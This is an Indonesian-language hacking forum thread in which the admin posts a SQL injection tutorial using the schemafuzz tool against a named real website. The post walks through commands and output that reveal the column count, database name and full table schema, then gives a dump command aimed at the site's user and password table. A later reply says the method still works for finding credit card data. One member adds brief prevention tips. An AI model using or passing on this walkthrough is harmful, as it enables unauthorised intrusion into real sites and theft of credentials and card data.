SQL injection with schemafuzz

Go down

SQL injection with schemafuzz

Post by angelblood on Fri Apr 16, 2010 9:00 am

Hey dude, sekarang gw bakal kasih tutorial tentang SQL inject pake schemafuzz, mulai !
Langkah pertama, siapin :
1. Python (untuk pengguna windows harus install dulu, untuk linux, LANJUUUUT !)
2. Schemafuzz, bisa dicari lewat google (banyak kok, apalagi di darkc0de.com)
3. Kopi
4. Cemilan
5. Sampoerna mild sebungkus

Lanjut dengan mencari bugs pada website target yang vuln (biasanya terdapat pada halaman news,berita dan masih banyak lagi).
Untuk tau web tersebut vuln atau kagak, bisa di cek dengan cara memberikan single quote ( ' ) diakhir URL target, contoh : [You must be registered and logged in to see this link.] ==> perhatiin tanda ( ' ).
Kalo halaman website keluar pesan error seperti "mySQL syntax error . . ." berarti website tersebut vuln terhadap SQL injection.
Biar lebih mudah, file schemafuzz.py nya pasang di desktop aja.
Terus masuk ke terminal (linux) atau command prompt (windows) dan masuk ke desktop dengan cara (ketik di command prompt) : cd Desktop.
cari kolom di web target dengan cara ngejalanin schemafuzz, command :
schemafuzz.py --findcol -u [You must be registered and logged in to see this link.]
hasil :


[+] URL:http://www.ditplb.or.id/profile.php?id=1--
[+] Evasion Used: "+" "--"
[+] 14:10:38
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,
[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL: [You must be registered and logged in to see this link.]
[+] darkc0de URL: [You must be registered and logged in to see this link.]
[-] Done!
Dari data di atas, banyaknya kolom ada 3 (wah,dikit banget) !
Terus cari nama database, command :
schemafuzz.py --dbs -u [You must be registered and logged in to see this link.]
hasil :


[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:15:38
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.51a-24+lenny3
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
[-] [14:16:13]
[-] Total URL Requests 3
[-] Done
nama database nya dapet tuh.
langsung cek tabel dan kolomnya (jangan lupa di belakangan URL, kasih command : -D namadatabase), command :
schemafuzz.py --schema -u [You must be registered and logged in to see this link.] -D t15618_plb
hasil :


[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:20:00
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.51a-24+lenny3
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11

[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin

[-] [14:25:13]
[-] Total URL Requests 48
[-] Done

Terakhir, masukin command :
schemafuzz.py --dump -u [You must be registered and logged in to see this link.] -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin

HASIL : GUNAKAN DENGAN BIJAK !!

APAPUN YANG ANDA LAKUKAN SETELAH MEMBACA TUTORIAL INI BUKAN TANGGUNG JAWAB PENULIS. Twisted Evil
avatar
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 27
Location : Depok, Jawa Barat

View user profile http://blacklist-team.forumsmotion.com

Back to top Go down

Re: SQL injection with schemafuzz

Post by cRim3²¹ on Fri Apr 16, 2010 9:11 pm

Laughing
avatar
cRim3²¹

Posts : 43
Reputation : 4
Join date : 2010-04-16
Location : Hidden elf

View user profile

Back to top Go down

Re: SQL injection with schemafuzz

Post by angelblood on Sat Apr 17, 2010 12:49 am

ampun kk, jangan ketawain tutorial aku, aku emang cupu dalam masalah ini.
No
avatar
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 27
Location : Depok, Jawa Barat

View user profile http://blacklist-team.forumsmotion.com

Back to top Go down

Re: SQL injection with schemafuzz

Post by cRim3²¹ on Sat Apr 17, 2010 1:17 am

aq jga tidak mengerti msalah SQL.. Sad

mkasih buat ilmunya kk..


sedikit info yg mungkin udh basi...
______________________________________________________
khusus buat kakang admin & web programer Very Happy
______________________________________________________

Cara pencegahan SQL yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
mungkin bsa bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang. (Embarassed )
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


share yg bodoh.. lol!
avatar
cRim3²¹

Posts : 43
Reputation : 4
Join date : 2010-04-16
Location : Hidden elf

View user profile

Back to top Go down

Re: SQL injection with schemafuzz

Post by cRim3²¹ on Sat Apr 17, 2010 1:37 am

^
l
l
l
copas
avatar
cRim3²¹

Posts : 43
Reputation : 4
Join date : 2010-04-16
Location : Hidden elf

View user profile

Back to top Go down

Re: SQL injection with schemafuzz

Post by angelblood on Sat Apr 17, 2010 1:56 am

kan ini tutor buat newbie kk, kalo cuma sekedar untuk cari CC ya masih ampuh kok cara yg satu ini.

kecuali kita mau ngedump situs2 gede, sama aja buang2 waktu kalo pake cara ini, karna tabel yang ke baca bisa sampe ratusan bahkan ribuan.

tapi bagus juga, kasih cara defend.
thanks.
avatar
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 27
Location : Depok, Jawa Barat

View user profile http://blacklist-team.forumsmotion.com

Back to top Go down

Re: SQL injection with schemafuzz

Post by Hacker Ndeso on Tue Apr 20, 2010 12:22 pm

nimbrung dunks.... Twisted Evil
avatar
Hacker Ndeso

Posts : 1
Reputation : 5
Join date : 2010-04-18

View user profile

Back to top Go down

Re: SQL injection with schemafuzz

Post by angelblood on Tue Apr 20, 2010 1:05 pm

alih profesi leng ?
lol!
avatar
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 27
Location : Depok, Jawa Barat

View user profile http://blacklist-team.forumsmotion.com

Back to top Go down

Re: SQL injection with schemafuzz

Post by mummi_bakar on Fri Jun 11, 2010 7:12 pm

we...gtu ya... Very Happy
avatar
mummi_bakar

Posts : 15
Reputation : 5
Join date : 2010-06-11
Location : C:\Documents and Settings\Admin\mummi_bakar

View user profile

Back to top Go down

Re: SQL injection with schemafuzz

Post by angelblood on Sat Jun 12, 2010 4:50 pm

wah, master mana nih yg baru gabung ?!
avatar
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 27
Location : Depok, Jawa Barat

View user profile http://blacklist-team.forumsmotion.com

Back to top Go down

Re: SQL injection with schemafuzz

Post by mummi_bakar on Sun Jun 13, 2010 7:07 pm

ane newbe kk... Wink

mohon bimbingn yak,
avatar
mummi_bakar

Posts : 15
Reputation : 5
Join date : 2010-06-11
Location : C:\Documents and Settings\Admin\mummi_bakar

View user profile

Back to top Go down

Re: SQL injection with schemafuzz

Post by angelblood on Sun Jun 13, 2010 8:59 pm

ngerendah ni yeee.
avatar
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 27
Location : Depok, Jawa Barat

View user profile http://blacklist-team.forumsmotion.com

Back to top Go down

Re: SQL injection with schemafuzz

Post by anak_luchu on Thu Jul 29, 2010 4:15 pm

Very Happy

anak_luchu

Posts : 2
Reputation : 5
Join date : 2010-04-25

View user profile

Back to top Go down

Re: SQL injection with schemafuzz

Post by angelblood on Thu Jul 29, 2010 4:26 pm

Twisted Evil
avatar
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 27
Location : Depok, Jawa Barat

View user profile http://blacklist-team.forumsmotion.com

Back to top Go down

Re: SQL injection with schemafuzz

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum